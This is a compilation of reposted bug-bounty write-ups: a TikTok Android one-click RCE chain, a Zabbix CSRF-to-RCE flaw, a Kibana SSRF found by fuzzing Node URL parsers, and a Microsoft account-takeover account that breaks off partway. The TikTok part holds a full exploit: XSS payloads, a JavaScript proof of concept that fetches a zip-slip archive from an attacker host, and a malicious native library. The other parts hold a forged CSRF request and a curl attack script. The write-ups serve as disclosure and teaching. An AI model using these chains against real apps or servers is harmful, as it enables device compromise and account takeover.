TikTok for Android 1-Click RCE


Original text by Sayed Abdelhafiz


While testing the TikTok Android application, I identified multiple bugs that can be chained together to achieve remote code execution, reachable through several dangerous attack vectors. In this write-up I will discuss each bug and the full chain. I worked on it for about 21 days, a long time given that the final exploit was simple, but the time I spent gave me incredible experience with the application and an important trick that helped a lot in the exploit. TikTok implemented a fix to address the identified bugs, and a retest confirmed the resolution.


  1. Universal XSS on TikTok WebView
  2. Another XSS on AddWikiActivity
  3. Start Arbitrary Components
  4. Zip Slip in TmaTestActivity
  5. RCE!

Universal XSS on TikTok WebView

TikTok uses a dedicated WebView that can be invoked via deep links or inbox messages. The WebView handles so-called falcon links by serving them from internal files instead of fetching them from the server on every visit, to improve performance.

For performance-measurement purposes, the following function is executed after the page finishes loading:

this.a.evaluateJavascript("JSON.stringify(window.performance.getEntriesByName(\'" + this.webviewURL + "\'))", v2);

The first idea that came to my mind was injecting an XSS payload into the URL to escape the function call and execute malicious code.

I tried the following link https://m.tiktok.com/falcon/?'),alert(1));//

Unfortunately, it didn’t work, so I wrote a Frida script hooking the android.webkit.WebView.evaluateJavascript method to see what was happening.

I found that the following string was passed to the method:


The payload was being encoded because it was in the query-string segment, so I decided to put the payload in the fragment segment, after the #.

https://m.tiktok.com/falcon/#'),alert(1));// will fire the following line:


Now it’s done! We have a universal XSS in that WebView.

Notice: it’s a universal XSS because the JavaScript fires whenever the link contains something like m.tiktok.com/falcon/.

For example, https://www.google.com/m.tiktok.com/falcon/ will fire this XSS too.
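The encoding difference can be reproduced outside the app. This is a minimal Node.js sketch (my own, not TikTok’s code) showing that WHATWG-style URL parsing percent-encodes the single quote in the query string but leaves the fragment untouched, which is why only the fragment payload survives:

```javascript
// Query-string payload: the ' is percent-encoded, breaking the injection.
const q = new URL("https://m.tiktok.com/falcon/?'),alert(1));//");
// Fragment payload: the ' is preserved verbatim.
const f = new URL("https://m.tiktok.com/falcon/#'),alert(1));//");

console.log(q.href); // the quote becomes %27 in the query
console.log(f.hash); // the fragment keeps the raw payload intact
```

The Android WebView’s URL handling behaved analogously: the query was sanitized before reaching evaluateJavascript, the fragment was not.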


After finding this XSS, I started digging into that WebView to see how harmful it could be.

First, I set up my lab to make testing easier. I enabled the WebViewDebug module so I could debug the WebView from the dev tools in Google Chrome. You can find the module here: https://github.com/feix760/WebViewDebugHook

I found that the WebView supports the intent scheme. This scheme lets you build a customized intent and launch it as an activity. It’s helpful for bypassing the export setting of non-exported activities and maximizing the testing scope.

Read the following paper for more information about this scheme and how it is implemented: https://www.mbsd.jp/Whitepaper/IntentScheme.pdf

I tried to execute the following javascript code to open com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity Activity:

location = "intent:#Intent;component=com.zhiliaoapp.musically/com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity;package=com.zhiliaoapp.musically;action=android.intent.action.VIEW;end;"

But I didn’t notice any effect from executing that JavaScript, so I went back to the WebViewClient to see what was happening, and found the following code:

boolean v0_7 = v0_6 == null ? true : v0_6.hasClickInTimeInterval();
if((v8.i) && !v0_7) {
    v8.i = false;
    v4 = true;
} else {
    v4 = v0_7;
}
This code prevents the intent scheme from taking effect unless the user has just clicked somewhere. Bad! I don’t like 2-click exploits, so I saved this in my notes and continued my digging trip.

ToutiaoJSBridge is a bridge implemented in the WebView. It has many fruitful functions; one of them is openSchema, which is used to open internal deep links. There is a deep link called aweme://wiki that opens URLs in the AddWikiActivity WebView.

Another XSS on AddWikiActivity

AddWikiActivity implements URL validation to make sure no blacklisted URL can be opened in it. But the validation only applied to the http and https schemes, because the developers assumed any other scheme was invalid and didn’t need validation:

if(!e.b(arg8)) {
    com.bytedance.t.c.e.b.a("AbsSecStrategy", "needBuildSecLink : url is invalid.");
    return false;
}

public static boolean b(String arg1) {
    return !TextUtils.isEmpty(arg1) && ((arg1.startsWith("http")) || (arg1.startsWith("https"))) && !e.a(arg1);
}

Pretty cool. Since the validation never runs for the javascript scheme, we can use that scheme to perform XSS attacks on this WebView too!

window.ToutiaoJSBridge._handleMessageFromToutiao(JSON.stringify({
    "__callback_id": "0",
    "func": "openSchema",
    "__msg_type": "callback",
    "params": {
        "schema": "aweme://wiki?url=javascript://m.tiktok.com/%250adocument.write(%22%3Ch1%3EPoC%3C%2Fh1%3E%22)&disable_app_link=false"
    },
    "JSSDK": "1",
    "namespace": "host",
    "__iframe_url": "http://iframe.attacker.com/"
}));
<h1>PoC</h1> got printed in the WebView.
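The flawed logic boils down to a scheme check that only ever validates http(s) URLs. This is an illustrative JavaScript port (the function name is mine; the real code is the Java snippet above):

```javascript
// Only URLs starting with "http" are ever validated against the blacklist,
// so a javascript: URL is treated as "invalid" and skips validation entirely.
function needsSecLinkCheck(url) {
  // note: startsWith("https") is redundant, since "https" already starts with "http"
  return !!url && (url.startsWith("http") || url.startsWith("https"));
}

console.log(needsSecLinkCheck("https://evil.example/")); // true  -> gets validated
console.log(needsSecLinkCheck("javascript:alert(1)"));   // false -> never validated
```

The mistake is conflating "not http(s)" with "harmless": the javascript scheme is neither http(s) nor harmless.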

Start Arbitrary Components

The good news is that the AddWikiActivity WebView supports the intent scheme too, without any click restriction, provided the disable_app_link parameter is set to false. Easy, man!

If the following code gets executed in AddWikiActivity, UserFavoritesActivity will be invoked:


Zip Slip in TmaTestActivity

Now, we can open any activity and pass any extras to it. I found an activity called TmaTestActivity in a split package called split_df_miniapp.apk.

Notice: split packages are not shipped in the base APK; they are downloaded after the first launch of the application by Google Play Core. You can find those packages with: adb shell pm path {package_name}

In a nutshell, TmaTestActivity was used to update the SDK by downloading a zip file from the internet and extracting it.

Uri v5 = Uri.parse(Uri.decode(arg5.toString()));
String v0 = v5.getQueryParameter("action");
if(m.a(v0, "sdkUpdate")) {
    m.a(v5, "testUri");
    this.updateJssdk(arg4, v5, arg6);
}

To invoke the update process, we have to set the action parameter to sdkUpdate.

private final void updateJssdk(Context arg5, Uri arg6, TmaTestCallback arg7) {
    String v0 = arg6.getQueryParameter("sdkUpdateVersion");
    String v1 = arg6.getQueryParameter("sdkVersion");
    String v6 = arg6.getQueryParameter("latestSDKUrl");
    SharedPreferences.Editor v2 = BaseBundleDAO.getJsSdkSP(arg5).edit();
    v2.putString("sdk_update_version", v0).apply();
    v2.putString("sdk_version", v1).apply();
    v2.putString("latest_sdk_url", v6).apply();
    DownloadBaseBundleHandler v6_1 = new DownloadBaseBundleHandler();
    BundleHandlerParam v0_1 = new BundleHandlerParam();
    v6_1.setInitialParam(arg5, v0_1);
    ResolveDownloadHandler v5 = new ResolveDownloadHandler();
    SetCurrentProcessBundleVersionHandler v6_2 = new SetCurrentProcessBundleVersionHandler();
    // ...
}

It collects the SDK update information from the parameters, then invokes a DownloadBaseBundleHandler instance, sets the next handler to ResolveDownloadHandler, and finally SetCurrentProcessBundleVersionHandler.

Let’s start with DownloadBaseBundleHandler. It checks the sdkUpdateVersion parameter to see whether it is newer than the current version. We can set the value to 99.99.99 to pass this check, and the download then starts:

public BundleHandlerParam handle(Context arg14, BundleHandlerParam arg15) {
    String v0 = BaseBundleManager.getInst().getSdkCurrentVersionStr(arg14);
    String v8 = BaseBundleDAO.getJsSdkSP(arg14).getString("sdk_update_version", "");
    if(AppbrandUtil.convertVersionStrToCode(v0) >= AppbrandUtil.convertVersionStrToCode(v8) && (BaseBundleManager.getInst().isRealBaseBundleReadyNow())) {
        InnerEventHelper.mpLibResult("mp_lib_validation_result", v0, v8, "no_update", "", -1L);
        v10.appendLog("no need update remote basebundle version");
        arg15.isIgnoreTask = true;
        return arg15;
    }
    this.startDownload(v9, v10, arg15, v0, v8);
    // ...
}
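The version gate can be illustrated with a small sketch. The real convertVersionStrToCode implementation isn’t shown, so this encoding is an assumption; the point is that any monotonic version encoding lets 99.99.99 win the comparison and reach startDownload:

```javascript
// Hypothetical port of the version comparison: each dotted component is
// folded into a single integer code, so a bigger version string yields
// a bigger code.
function convertVersionStrToCode(v) {
  return v.split(".").reduce((code, part) => code * 1000 + parseInt(part, 10), 0);
}

const current = convertVersionStrToCode("1.87.1");  // installed SDK version
const update = convertVersionStrToCode("99.99.99"); // attacker-supplied sdkUpdateVersion

console.log(update > current); // true -> the "no update" branch is skipped
```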

In the startDownload method, I found the following:

v2.a = StorageUtil.getExternalCacheDir(AppbrandContext.getInst().getApplicationContext()).getPath();
v2.b = this.getMd5FromUrl(arg16);

v2.a is the download path. It gets the application context from AppbrandContext, which must have an instance. Unfortunately, the application doesn’t initialize this instance all the time. But remember, I spent 21 days on this exploit. That was enough to gain extensive knowledge of the application’s workflow, and yes, I had seen somewhere that this instance gets initialized.

Invoking the preloadMiniApp function through ToutiaoJSBridge initialized the instance for me! Digging into every function of this bridge, even those that didn’t look useful at first, paid off in this situation ;).

v2.b is the md5sum of the file being downloaded. It is taken from the filename itself:

private String getMd5FromUrl(String arg3) {
    return arg3.substring(arg3.lastIndexOf("_") + 1, arg3.lastIndexOf("."));
}

The filename must look like anything_{md5sum_of_file}.zip, because this value is compared with the file’s md5sum after downloading:

public void onDownloadSuccess(ad arg11) {
    File v11 = new File(this.val$tmaFileRequest.a, this.val$tmaFileRequest.b);
    long v6 = this.val$beginDownloadTime.getMillisAfterStart();
    if(!v11.exists()) {
        this.val$baseBundleEvent.appendLog("remote basebundle download fail");
        this.val$param.isLastTaskSuccess = false;
        this.val$baseBundleEvent.appendLog("remote basebundle not exist");
        InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "fail", "md5_fail", v6);
    }
    else if(this.val$tmaFileRequest.b.equals(CharacterUtils.md5Hex(v11))) {
        this.val$baseBundleEvent.appendLog("remote basebundle download success, md5 verify success");
        this.val$param.isLastTaskSuccess = true;
        this.val$param.targetZipFile = v11;
        InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "success", "", v6);
    }
    else {
        this.val$baseBundleEvent.appendLog("remote basebundle md5 not equals");
        InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "fail", "md5_fail", v6);
        this.val$param.isLastTaskSuccess = false;
    }
}

After the download finishes, the file is passed to ResolveDownloadHandler to be unzipped:

public BundleHandlerParam handle(Context arg13, BundleHandlerParam arg14) {
    BaseBundleEvent v0 = arg14.baseBundleEvent;
    if((arg14.isLastTaskSuccess) && arg14.targetZipFile != null && (arg14.targetZipFile.exists())) {
        arg14.bundleVersion = BaseBundleFileManager.unZipFileToBundle(arg13, arg14.targetZipFile, "download_bundle", false, v0);
        // ...
    }
}

public static long unZipFileToBundle(Context arg8, File arg9, String arg10, boolean arg11, BaseBundleEvent arg12) {
    long v10;
    boolean v4;
    Class v0 = BaseBundleFileManager.class;
    synchronized(v0) {
        boolean v1 = arg9.exists();
        if(!v1) {
            return 0L;
        }
        try {
            File v1_1 = BaseBundleFileManager.getBundleFolderFile(arg8, arg10);
            arg12.appendLog("start unzip" + arg10);
            BaseBundleFileManager.tryUnzipBaseBundle(arg12, arg10, v1_1.getAbsolutePath(), arg9);
            // ...
    }
}

private static void tryUnzipBaseBundle(BaseBundleEvent arg2, String arg3, String arg4, File arg5) {
    try {
        arg2.appendLog("unzip" + arg3);
        IOUtils.unZipFolder(arg5.getAbsolutePath(), arg4);
        // ...
}

public static void unZipFolder(String arg1, String arg2) throws Exception {
    IOUtils.a(new FileInputStream(arg1), arg2, false);
}

private static void a(InputStream arg5, String arg6, boolean arg7) throws Exception {
    ZipInputStream v0 = new ZipInputStream(arg5);
    while(true) {
        ZipEntry v5 = v0.getNextEntry();
        if(v5 == null) {
            break;
        }
        String v1 = v5.getName();
        if((arg7) && !TextUtils.isEmpty(v1) && (v1.contains("../"))) { // Did you notice arg7?
            continue; // goto label_2
        }
        if(v5.isDirectory()) {
            new File(arg6 + File.separator + v1.substring(0, v1.length() - 1)).mkdirs();
            continue; // goto label_2
        }
        File v5_1 = new File(arg6 + File.separator + v1);
        if(!v5_1.getParentFile().exists()) {
            // ...
        }
        FileOutputStream v1_1 = new FileOutputStream(v5_1);
        byte[] v5_2 = new byte[0x400];
        while(true) {
            int v3 = v0.read(v5_2);
            if(v3 == -1) {
                break;
            }
            v1_1.write(v5_2, 0, v3);
        }
    }
}

In the last method, which actually unzips the file, there is a check for path traversal, but because the arg7 value is false, the check never happens. Perfect!!

This makes it possible to exploit Zip Slip and overwrite some delicious files.

Time for RCE!

I created a zip file with a path-traversing entry name to overwrite the /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so file:

dphoeniixx@MacBook-Pro Tiktok % 7z l libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64)

Scanning the drive for archives:
1 file, 1930 bytes (2 KiB)

Listing archive: libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip

Path = libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip
Type = zip
Physical Size = 1930

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 ..... 5896 1496 ../../../../../../../../../data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 5896 1496 1 files

Now we can overwrite native libraries with a malicious one to execute our code. It won’t be executed unless the user relaunches the application, but I found a way to reload the library without a relaunch: launching the com.tt.miniapphost.placeholder.MiniappTabActivity0 activity.

Final PoC:

document.title = "Loading..";
if (document && window.name != "finished") { // the XSS fires multiple times, before and after the page loads; this check makes sure the payload only runs once.
    window.name = "finished";
    window.ToutiaoJSBridge._handleMessageFromToutiao(JSON.stringify({
        "__callback_id": "0",
        "func": "preloadMiniApp",
        "__msg_type": "callback",
        "params": {
            "mini_app_url": "https://microapp/"
        },
        "JSSDK": "1",
        "namespace": "host",
        "__iframe_url": "http://d.c/"
    })); // initialize the Mini App
    window.ToutiaoJSBridge._handleMessageFromToutiao(JSON.stringify({
        "__callback_id": "0",
        "func": "openSchema",
        "__msg_type": "callback",
        "params": {
            "schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%2F%2Fwww.google.com.eg%2F%3Faction%3DsdkUpdate%26latestSDKUrl%3Dhttp%3A%2F%2F{ATTACKER_HOST}%2Flibran_a1ef01b09a3d9400b77144bbf9ad59b1.zip%26sdkUpdateVersion%3D1.87.1.11%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapp.tmatest.TmaTestActivity%3Bpackage%3Dcom.zhiliaoapp.musically%3Baction%3Dandroid.intent.action.VIEW%3Bend%22)%3B%0A&noRedirect=false&title=First%20Stage&disable_app_link=false"
        },
        "JSSDK": "1",
        "namespace": "host",
        "__iframe_url": "http://iframe.attacker.com/"
    })); // download the malicious zip file that will overwrite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
    setTimeout(function() {
        window.ToutiaoJSBridge._handleMessageFromToutiao(JSON.stringify({
            "__callback_id": "0",
            "func": "openSchema",
            "__msg_type": "callback",
            "params": {
                "schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapphost.placeholder.MiniappTabActivity0%3Bpackage%3Dcom.zhiliaoapp.musically%3BS.miniapp_url%3Dhttps%3Bend%22)%3B%0A&noRedirect=false&title=Second%20Stage&disable_app_link=false"
            },
            "JSSDK": "1",
            "namespace": "host",
            "__iframe_url": "http://iframe.attacker.com/"
        })); // load the malicious library after overwriting it.
    }, 5000);
}

Malicious library code:

#include <jni.h>
#include <string>
#include <stdlib.h>

extern "C" JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {
    system("id > /data/data/com.zhiliaoapp.musically/PoC");
    return JNI_VERSION_1_6;
}

TikTok Fixing!

TikTok’s security team implemented an excellent and responsible fix to address those vulnerabilities in a timely manner. The following actions were taken:

  1. The vulnerable XSS code has been deleted.
  2. TmaTestActivity has been deleted.
  3. Restrictions were added so the intent scheme can no longer target the TikTok application from AddWikiActivity and the main WebViewActivity.

Have a nice day!

CVE-2021-27927: CSRF to RCE Chain in Zabbix


Original text horizon3ai


Zabbix is an enterprise IT network and application monitoring solution. In a routine review of its source code, we discovered a CSRF (cross-site request forgery) vulnerability in the authentication component of the Zabbix UI. Using this vulnerability, an unauthenticated attacker can take over the Zabbix administrator’s account if the attacker can persuade the Zabbix administrator to follow a malicious link. This vulnerability is exploitable in all browsers even with the default SameSite=Lax cookie protection in place. The vulnerability is fixed in Zabbix versions 4.0.28rc1, 5.0.8rc1, 5.2.4rc1, and 5.4.0alpha1.


The impact of this vulnerability is high. While user interaction is required to exploit the vulnerability, the consequence of a successful exploit is full takeover of the Zabbix administrator account. Administrative access to Zabbix provides attackers a wealth of information about other devices on the network and the ability to execute arbitrary commands on the Zabbix server. In certain configurations, attackers can also execute arbitrary commands on hosts being monitored by Zabbix.

CVSS vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

As of this writing, there are ~20K instances of Zabbix on the internet that can be found with the Shodan dork "html: Zabbix".


Upgrade to at least Zabbix version 4.0.28rc1, 5.0.8rc1, 5.2.4rc1, or 5.4.0alpha1.


A CSRF exploit works as follows:

  • First, a user (the victim) logs in to a vulnerable web site (the target). "Logged in" in this case simply means the user’s browser has stored a valid session cookie or basic authentication credential for the target web site. The browser application doesn’t necessarily need to be open.  
  • Next, an attacker uses social engineering to persuade the victim user to follow a link to a malicious attacker-controlled web site. There are a variety of methods to achieve this such as phishing emails or links in chat, etc.  
  • When the victim visits the malicious web site, HTML/JavaScript code from the malicious site gets loaded into the victim’s browser. This code then sends an API request to the target web site. The request originating from the malicious web site looks legitimate to the victim’s browser, and as a result, the victim’s browser sends the user’s session cookies along with the request.  
  • The malicious request lands at the target web application. The target web application can’t tell that the request is coming from a malicious source. The target web application carries out the requested action on behalf of the attacker. CSRF attacks often try to abuse authentication-related actions such as creating or modifying users or changing passwords.

CSRF Attack Prevention

The most commonly used defense against CSRF attacks is anti-CSRF tokens. These tokens are randomly generated pieces of data that are sent as part of requests from an application’s frontend code to the backend. The backend verifies both the anti-CSRF token and the user’s session cookie. The token can be transferred as an HTTP header or in the request body, but not as a cookie. This method, if implemented correctly, defeats CSRF attacks because it becomes very difficult for attackers to craft forged requests that include the correct anti-CSRF token.

Zabbix uses an anti-CSRF token in the form of a sid parameter that’s passed in the request body. For instance the request to update the Zabbix Admin user’s password to the value zabbix1 looks like this:

This request fails if the sid parameter is missing or incorrect.

Another measure that offers some protection against CSRF attacks is the SameSite cookie attribute. This is a setting that browsers use to determine when it’s OK to send cookies as part of cross-site requests to a site. This attribute has three values: Strict, Lax, and None.

  • SameSite=Strict: Never send cookies as part of cross-site requests.
  • SameSite=Lax: Only send cookies as part of cross-site requests if they are GET requests and effect a top-level navigation, i.e. result in a change to the browser’s address bar. Clicking a link is considered a top-level navigation, while loading an image or script is not. GET requests are generally considered safe because they are not supposed to mutate any backend state.
  • SameSite=None: Send cookies along with all cross-site requests.

Web application developers can choose to set the value of the SameSite attribute explicitly when sending a cookie to the frontend after a user authenticates. If the attribute is not set explicitly, modern browsers default the value to Lax. This is the case with Zabbix: the SameSite attribute is not set, so it defaults to Lax.
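Setting the attribute explicitly is a one-line change when the cookie is issued. A sketch with an illustrative cookie name (not Zabbix’s actual cookie):

```javascript
// Build a Set-Cookie header value with an explicit SameSite policy
// instead of relying on the browser's Lax default.
function sessionCookieHeader(value, sameSite) {
  return `zbx_sessionid=${value}; HttpOnly; Secure; SameSite=${sameSite}`;
}

console.log(sessionCookieHeader("abc123", "Strict"));
// zbx_sessionid=abc123; HttpOnly; Secure; SameSite=Strict
```

With Strict, the session cookie would never accompany a cross-site request, including the top-level GET navigation this attack relies on.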

Zabbix CVE-2021-27927

As mentioned above, Zabbix uses anti-CSRF tokens, and these tokens are effective against CSRF attacks that attempt to exploit actions such as adding and modifying users and roles. However there was one important scenario we found in which anti-CSRF tokens were not being validated: an update to the application’s authentication settings.

This form controls the type of authentication that is used to log in to Zabbix, which can be either "Internal" or "LDAP". In the case of LDAP, one can also set the details of the LDAP provider, such as the LDAP host and port, base DN, etc.

The backend controller class CControllerAuthenticationUpdate that handles this form submission had token validation turned off, as shown below:

In addition, and just as important, we found that in Zabbix any parameters submitted in a request body via POST could equivalently be submitted as URL query parameters via a GET. This meant that the following forged GET request, which is missing the sid parameter, could work just as well as a legitimate POST request that contains the sid.

GET /zabbix.php?form_refresh=1&action=authentication.update&db_authentication_type=0&authentication_type=1&http_auth_enabled=0&ldap_configured=1&ldap_host=!&saml_auth_enabled=0&update=Update

The above request updates the authentication method to LDAP and sets various LDAP attributes.


To carry out a full attack, an attacker would do the following:

First, set up an attacker-controlled LDAP server that is network-accessible to the target Zabbix application. For our example, we used an Active Directory server. We also provisioned a user called "Admin" (which matches the built-in Zabbix admin user name) inside Active Directory with the password "Z@bb1x!".  

Then, host a web site containing a malicious HTML page. For our example, we had an HTML page that contained a link with the forged cross-site request. Upon loading the page, the link would be automatically clicked via JavaScript. This meets the requirement for "top-level navigation."


  <p>Any web site</p>
  <a id='link' href='!&saml_auth_enabled=0&update=Update'></a>


Finally, entice the victim Zabbix Admin user to click on the link to the malicious site. Once this happens, the Zabbix Admin would see that the authentication settings on the site were automatically updated like this:

At this point an attacker can log in with his/her own Admin user credential. Incidentally, the victim Zabbix Admin’s session still remains valid until he/she logs out.

One interesting aspect of this particular CSRF attack is that it’s not blind. This is because Zabbix validates the LDAP server connection using a test user and password as part of processing the authentication settings form submission. An attacker can know immediately if the CSRF attack was successful by virtue of the Zabbix application connecting to his/her own LDAP server. Once the test connection takes place, an attacker could automate logging into the victim’s Zabbix server and carrying out further actions.

Remote Command Execution

Once an attacker has gained admin access, he/she can gain remote command execution privileges easily because it is a built-in feature of the product. The Scripts section of the UI contains a place to drop in any commands to be executed on either the Zabbix server, a Zabbix server proxy, or a Zabbix agent (agents run on hosts being monitored by Zabbix).

For instance, to get a reverse shell on the Zabbix server, an attacker could modify the built-in Detect Operating Systems script to include a perl reverse shell payload like this:

Then execute the script off the dashboard page:

To get a reverse shell:

Depending on the configuration, an attacker can also run remote commands at the server proxy or agent. More details here from the Zabbix documentation.


  • Jan. 3, 2021: Vulnerability disclosed to vendor
  • Jan. 13, 2021: Vulnerability fixed in code by vendor
  • Feb. 22, 2021: New releases made available by vendor across all supported versions
  • Mar. 3, 2021: Public disclosure  


SSRF: Bypassing hostname restrictions with fuzzing


Original text by dee__see

When the same data is parsed twice by different parsers, some interesting security bugs can be introduced. In this post I will show how I used fuzzing to find a parser differential issue in Kibana’s alerting and actions feature, and how I leveraged radamsa to fuzz NodeJS’ URL parsers.

Kibana alerting and actions

Kibana has an alerting feature that allows users to trigger an action when certain conditions are met. There’s a variety of actions that can be chosen like sending an email, opening a ticket in Jira or sending a request to a webhook. To make sure this doesn’t become SSRF as a feature, there’s an xpack.actions.allowedHosts setting where users can configure a list of hosts that are allowed as webhook targets.

Parser differential

Parsing URLs consistently is notoriously difficult and sometimes the inconsistencies are there on purpose. Because of this, I was curious to see how the webhook target was validated against the xpack.actions.allowedHosts setting and how the URL was parsed before sending the request to the webhook. Is it the same parser? If not, are there any URLs that can appear fine to the hostname validation but target a completely different URL when sending the HTTP request?

After digging into the webhook code, I could identify that hostname validation happens in isHostnameAllowedInUri. The important part to notice is that the hostname is extracted from the webhook’s URL by doing new URL(userInputUrl).hostname.

function isHostnameAllowedInUri(config: ActionsConfigType, uri: string): boolean {
  return pipe(
    tryCatch(() => new URL(uri)),
    map((url) => url.hostname),
    mapNullable((hostname) => isAllowed(config, hostname)),
    getOrElse<boolean>(() => false)
  );
}

On the other hand, the library that sends the HTTP request uses require('url').parse(userInputUrl).hostname to parse the hostname.

var url = require('url');

// ...

// Parse url
var fullPath = buildFullPath(config.baseURL, config.url);
var parsed = url.parse(fullPath);

// ...

options.hostname = parsed.hostname;

After reading some documentation, I could validate that those were effectively two different parsers and not just two ways of doing the same thing. Very interesting! Now I’m looking for a URL that is accepted by isHostnameAllowedInUri but results in an HTTP request to a different host. In other words, I’m looking for X where new URL(X).hostname !== require('url').parse(X).hostname and this is where the fuzzing comes in.

Fuzzing for SSRF

When you’re looking to generate test strings without going all in with coverage guided fuzzing like AFL or libFuzzer, radamsa is the perfect solution.

Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestingly different outputs from them.

The plan was the following:

  1. Feed a normal URL to radamsa as a starting point
  2. Parse radamsa’s output using both parsers
  3. If both parsed hostnames are different and valid, save that URL

Here’s the code used to do the fuzzing and validate the results:

const child_process = require('child_process');
const radamsa = child_process.spawn('./radamsa/bin/radamsa', ['-n', 'inf']);

radamsa.stdout.on('data', function (input) {
    input = 'http://' + input;

    // Resulting host names need to be valid for this to be useful
    function isInvalid(host) {
        return host === null || host === '' || !/^[a-zA-Z0-9.-]+$/.test(host);
    }

    let host1;
    try {
        host1 = new URL(input).hostname;
    } catch (e) {
        return; // Both hosts need to parse
    }

    if (isInvalid(host1)) return;
    if (/^([0-9.]+)$/.test(host1)) return; // host1 should be a domain, not an IP

    let host2;
    try {
        host2 = require('url').parse(input).hostname;
    } catch (e) {
        return; // Both hosts need to parse
    }

    if (isInvalid(host2)) return;
    if (host1 === host2) return;

    console.log(
        `${encodeURIComponent(input)} was parsed as ${host1} with URL constructor and ${host2} with url.parse.`
    );
});

There are some issues with that code and I think the stdin writer might have trouble handling null bytes, but nevertheless after a little while this popped up (the output was URL-encoded to catch non-printable characters):

http%3A%2F%2Fuser%3Apass%40domain.com%094294967298%2F%3Fab%3D- was parsed as domain.com4294967298 with URL constructor and domain.com with url.parse.

With the original string containing the hostname domain.com<TAB>4294967298, one parser stripped the tab character and the other truncated the hostname where the tab was inserted. This is very interesting and can definitely be abused: imagine a webhook that requires the target to be yourdomain.com, but when you enter yourdomain.co<TAB>m the filter thinks it’s valid while the request is actually sent to yourdomain.co. All the attacker has to do is register that domain and point it to an internal target, and it makes for a fun SSRF.

The attack

This is exactly what could be achieved in Kibana.

  1. Assume the xpack.actions.allowedHosts setting requires webhooks to target yourdomain.com
  2. As the attacker, register yourdomain.co
  3. Add a DNS record pointing it to an internal IP
  4. Create a webhook action
  5. Use the API to send a test message to the webhook and specify the url yourdomain.co<TAB>m
  6. Observe the response, in this case there were 3 different responses allowing to differentiate a live host, a live host that responds to HTTP requests and a dead host

Here’s the script used to demonstrate the attack.


# The \t is important

# Create Webhook Action
connector_id=$(curl -sk -u "$creds" --url "$kibana_url/api/actions/action" -X POST -H 'Content-Type: application/json' -H 'kbn-xsrf: true' \
    -d '{"actionTypeId":".webhook","config":{"method":"post","hasAuth":false,"url":"'$ssrf_target'","headers":{"content-type":"application/json"}},"secrets":{"user":null,"password":null},"name":"'$(date +%s)'"}' |
    jq -r .id)

# Send request to target using the test function
curl -sk -u "$creds" --url "$kibana_url/api/actions/action/$connector_id/_execute" -X POST -H 'Content-Type: application/json' -H 'kbn-xsrf: true' \
    -d '{"params":{"body":"{\"arbitrary_payload_here\":true}"}}'

# Server should have received the request


Unfortunately, the resulting URL with the bypass is a bit mangled, as we can see from this output taken from the NodeJS console:

> require('url').parse("htts://example.co\x09m/path")
Url {
  protocol: 'htts:',
  slashes: true,
  auth: null,
  host: 'example.co',
  port: null,
  hostname: 'example.co',
  hash: null,
  search: null,
  query: null,
  pathname: '%09m/path',
  path: '%09m/path',
  href: 'htts://example.co/%09m/path' }

The part truncated from the hostname is simply pushed to the path, which makes it hard to craft a request that achieves more than a basic internal network/port scan. However, if the parsers’ roles had been inverted and new URL had been used for the request instead, I would have had a clean path and much more potential for exploitation, with a fully controlled path and POST body. Surely this situation comes up somewhere; let me know if you come across something like that and are able to exploit it!


A few things to take away from this:

  • When reviewing code, any time data is parsed for validation, make sure it’s parsed the same way when it’s being used
  • Fuzzing with radamsa is simple and quick to set up, a great addition to any bug hunter’s toolbelt
  • If you’re doing blackbox testing and facing hostname validations in a NodeJS environment, try to add some tabs and see where that leads

Thanks for reading!

(This was disclosed with permission)

How I Might Have Hacked Any Microsoft Account


Original text by LAXMAN MUTHIYAH

This article is about how I found a vulnerability on Microsoft online services that might have allowed anyone to takeover any Microsoft account without consent permission. Microsoft security team patched the issue and rewarded me $50,000 as a part of their Identity Bounty Program.

After my Instagram account takeover vulnerability, I was searching for similar loopholes in other services. I found Microsoft is also using the similar technique to reset user’s password so I decided to test them for any rate limiting vulnerability.

To reset a Microsoft account’s password, we need to enter our email address or phone number in their forgot password page; after that, we will be asked to select the email or mobile number that can be used to receive the security code.

Once we receive the 7 digit security code, we will have to enter it to reset the password. Here, if we can brute-force all combinations of the 7 digit code (that is 10^7 = 10 million codes), we will be able to reset any user’s password without permission. But, obviously, there will be rate limits preventing us from making a large number of attempts.

The intercepted HTTP POST request made to the code validation endpoint looked like this:

If you look at the screenshot above, the code 1234567 we entered was nowhere present in the request. It was encrypted and then sent for validation. I guess they are doing this to prevent automated bruteforce tools from exploiting their system. So, we cannot automate testing multiple codes using tools like Burp Intruder since they won’t do the encryption part 😕

After some time, I figured out the encryption technique and was able to automate the entire process from encrypting the code to sending multiple concurrent requests.

